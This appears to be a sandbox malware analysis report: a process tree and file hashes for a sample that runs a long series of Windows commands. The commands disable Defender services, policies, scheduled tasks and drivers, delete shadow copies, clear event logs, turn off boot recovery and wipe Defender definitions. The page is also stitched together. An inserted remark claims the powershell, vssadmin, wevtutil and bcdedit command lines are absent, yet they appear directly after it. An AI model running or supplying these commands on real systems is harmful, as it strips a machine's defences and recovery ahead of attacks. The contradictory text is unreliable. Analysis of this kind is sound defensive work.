  2  PID 2460  C:\Windows\SYSTEM32\sc.exe
     cmd: sc.exe config "SDRSVC" start= disabled
  2  PID 3220  C:\Windows\SYSTEM32\sc.exe
     cmd: sc.exe config "SstpSvc" start= disabled
  2  PID 2980  C:\Windows\SYSTEM32\sc.exe
     cmd: sc.exe config "UI0Detect" start= disabled
  2  PID 3692  C:\Windows\SYSTEM32\sc.exe
     cmd: sc.exe config "vmicvss" start= disabled
  2  PID 3656  C:\Windows\SYSTEM32\sc.exe
     cmd: sc.exe config "VSS" start= disabled
  2  PID 1876  C:\Windows\SYSTEM32\sc.exe
     cmd: sc.exe config "wbengine" start= disabled
  2  PID 2396  C:\Windows\SYSTEM32\sc.exe
     cmd: sc.exe config "WebClient" start= disabled
  2  PID 3096  C:\Windows\SYSTEM32\sc.exe
     cmd: sc.exe config "UnistoreSvc_12e21" start= disabled
  2  PID 1624  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2  PID 2176  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2  PID 3800  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2  PID 1536  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2  PID 3168  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2  PID 4036  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2  PID 2084  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2  PID 1604  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2  PID 3144  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2  PID 2596  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2  PID 704  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2  PID 948  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2  PID 2516  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2  PID 1328  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2  PID 1476  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2  PID 1852  C:\Windows\SYSTEM32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2  PID 3920  C:\Windows\SYSTEM32\schtasks.exe
     cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2  PID 3900  C:\Windows\SYSTEM32\schtasks.exe
     cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2  PID 3564  C:\Windows\SYSTEM32\schtasks.exe
     cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2  PID 3504  C:\Windows\SYSTEM32\schtasks.exe
     cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

(The process list ends here at the schtasks entries. The powershell.exe, wevtutil.exe, wmic.exe, vssadmin.exe, bcdedit.exe and MpCmdRun.exe processes referenced in the signatures above are not included in this excerpt, so their command lines are not available on this page.)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:3552
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:868
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:3028
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1464
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2644 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1628 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3700 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:692
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:428
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:640
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1208
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3960 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1916
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1680 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1848 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2424 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2140 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1164 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2428 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3912 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3680 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3228
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2764 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2564 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2288
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1780
Network
MITRE ATT&CK Enterprise v6
Downloads
- MD5 ad5cd538ca58cb28ede39c108acb5785
  SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
  SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
  SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
- MD5 61c94667382d350f800effcc617528b5
  SHA1 0582550f8c9b282eda95a57ea959bd62932f7639
  SHA256 101da57e1e46a8aec4956ce3dc38bd69166216aa100a27bfc540a308dc01a972
  SHA512 e6ab33d976ceb11b629988205bb372c4cafb76cd96999d64086fdbce90f3aaf377d1c83e784e290207cd6285e14b6c0a1a1eabf91050c5046966b8e53fba0aaf